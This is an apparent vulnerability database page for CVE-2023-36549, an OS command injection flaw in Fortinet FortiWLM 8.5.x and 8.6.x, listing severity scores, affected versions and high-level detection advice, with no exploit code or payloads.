cbcvebase.
CVE-2023-36549
published 2023-10-10

CVE-2023-36549: A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through…

PriorityP270critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
2.11%
79.4th percentile
A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.

Affected

4 ranges
VendorProductVersion rangeFixed in
fortinetfortinet
fortinetfortiwlm
fortinetfortiwlm8.5.0 – 8.5.4
fortinetfortiwlm8.6.0 – 8.6.5

Detection & IOCsextracted from sources · hover to see the quote

  • Vulnerability is triggered via crafted HTTP GET request parameters to Fortinet FortiWLM; monitor for anomalous or malicious GET request parameters targeting FortiWLM endpoints
  • Affected versions are FortiWLM 8.6.0–8.6.5 and 8.5.0–8.5.4; flag any traffic to/from unpatched FortiWLM instances in these version ranges
  • OS command injection (CWE-78) via HTTP GET; inspect GET parameters for shell metacharacters or command chaining sequences targeting FortiWLM
  • ·This CVE is grouped with related FortiWLM OS command injection issues (CVE-2023-34993, CVE-2023-36547, CVE-2023-36548, CVE-2023-36550); detections should account for the full family of vulnerabilities sharing the same attack vector
  • ·CVSS score is 9.8 (Critical), indicating unauthenticated remote exploitation is likely; prioritize detection and patching for internet-exposed FortiWLM instances
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.